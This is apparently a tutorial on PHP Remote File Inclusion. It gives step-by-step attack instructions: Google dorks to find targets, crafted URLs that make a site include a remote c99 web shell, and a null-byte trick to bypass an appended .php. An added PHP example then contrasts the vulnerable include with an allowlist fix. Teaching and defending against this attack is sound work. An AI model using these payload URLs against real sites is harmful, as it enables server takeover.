Remote File Inclusion occurs when a remote file, usually a shell (a web interface for browsing files and running your own code on a server), is included in a website's PHP code. This allows the hacker to execute server-side commands as the user the web server runs as and to access files on the server. With this foothold the hacker can go on to use local exploits to escalate privileges and take over the whole system.
Many servers are vulnerable to this kind of attack because PHP's default settings have register_globals and allow_url_fopen enabled. Although as of PHP 6.0 register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let's go through the steps a hacker would take to exploit this type of vulnerability in a website.
1. First, the hacker finds a website that loads its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the use of Google's advanced search operators to narrow a search to a specific kind of result.
2. Websites that include pages this way have a navigation system with URLs similar to: http://target-site.com/index.php?page=PageName
3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like the following: http://target-site.com/index.php?page=http://www.google.com
4. If Google's page shows up, the website is vulnerable, and the hacker would continue by uploading the shell.
5. An elite hacker will program his own shell, but a script kiddie would just grab a shell from Google; some of the popular shells are c99 and r57. At the end of the URL, make sure to add a ? so that anything the script appends after c99.txt is passed to the shell as a query string and does not cause any problems. The new URL will look like: http://target-site.com/index.php?page=http://site.com/c99.txt?
Sometimes the PHP script on the server appends ".php" to the end of every included file. So if you included the shell, it would end up looking like "c99.txt.php" and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt.
Note: you can also search for sites vulnerable to this type of attack by using a Google dork. Just type allinurl:.php?page= into Google search and sites that may be vulnerable to this attack will come up, and if you succeed in getting the server to parse the shell.
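As an added example (not code from the original post), here is the include pattern the tutorial describes next to a hardened version that maps the page parameter through a fixed allowlist of local files; the file names and the pages/ directory are assumptions.

```php
<?php
// Added example, not from the original post. File and parameter names
// (index.php, ?page=, pages/) are assumptions matching the tutorial's URL.

// VULNERABLE: the page name is taken straight from the query string and
// concatenated into an include path. With allow_url_include enabled,
// ?page=http://site.com/c99.txt? fetches and runs remote code; the appended
// ".php" is what the %00 trick in the text tries to cut off (null bytes in
// paths are rejected since PHP 5.3.4, so that trick fails on newer PHP).
function include_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: resolve the request through an allowlist keyed by page name.
// Nothing from the URL ever becomes part of a filesystem path, so remote
// URLs, "../" sequences and null bytes have nothing to act on. Pair this
// with allow_url_include=Off (and allow_url_fopen=Off where possible) in php.ini.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $page): ?string
{
    // Exact key lookup only; unknown or malformed names return null.
    return ALLOWED_PAGES[$page] ?? null;
}

function include_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $file;
}

$page = $_GET['page'] ?? 'home';
include_page_hardened($page);
```

Requests such as ?page=http://www.google.com or ?page=c99.txt%00 fall through to the 404 branch because the lookup table has no such key, and the request value never reaches include().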